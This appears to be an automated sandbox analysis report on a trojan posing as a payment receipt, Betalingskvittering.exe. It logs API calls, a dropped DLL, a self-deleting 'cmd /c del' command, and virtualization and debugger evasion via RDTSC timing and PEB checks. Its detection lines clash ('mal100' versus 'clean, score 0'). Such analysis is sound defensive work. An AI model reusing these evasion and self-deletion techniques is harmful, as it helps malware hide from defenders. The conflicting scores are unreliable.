Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C597A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C598F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C598A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C599D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C595F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5AD30 NtSetContextThread,

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

Source: Betalingskvittering.exe, 00000000.00000003.349666063.000000000F166000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Betalingskvittering.exe
Source: Betalingskvittering.exe, 00000001.00000002.409576361.000000000263D000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs Betalingskvittering.exe
Source: Betalingskvittering.exe, 00000001.00000002.409380845.0000000000BEF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Betalingskvittering.exe

Source: Betalingskvittering.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Betalingskvittering.exe

File read: C:\Users\user\Desktop\Betalingskvittering.exe

Jump to behavior

Source: Betalingskvittering.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\Betalingskvittering.exe

File created: C:\Users\user\AppData\Local\Temp\nsjE503.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@13/9

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\Betalingskvittering.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,

Source: Betalingskvittering.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe
Source:	Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B87C push eax; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B812 push eax; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B81B push eax; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B8B6 push 10745811h; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B93B push 10745811h; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041BA2C push 10745811h; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0040C2BC push esp; iretd
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041BD2B push 10745811h; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00403632 push FFFFFF8Dh; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041B7C5 push eax; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00417FF6 push ecx; ret
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009BD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B76BD push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B76D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C6D0D1 push ecx; ret

Source: C:\Users\user\Desktop\Betalingskvittering.exe

File created: C:\Users\user\AppData\Local\Temp\nspE572.tmp\nkcyodylqw.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Betalingskvittering.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Betalingskvittering.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000248604 second address: 000000000024860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 000000000024898E second address: 0000000000248994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 5416	Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 7116	Thread sleep time: -46000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 1_2_004088C0 rdtsc

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,

Source: explorer.exe, 00000004.00000000.363062588.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.359385804.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000004.00000000.359385804.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000000.371391348.000000000461E000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.363062588.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_002C2258 IsDebuggerPresent,

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 0_2_73653070 sfynbu,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 1_2_004088C0 rdtsc

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_736554DA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_7365581C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_736556EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_736557DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_7365579F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009658EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A34015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A34015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00980050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00980050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A22073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A31074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009961A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009961A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009F41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00983A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00965210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00978A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A1B260 mov eax, dword ptr fs:[00000030h]
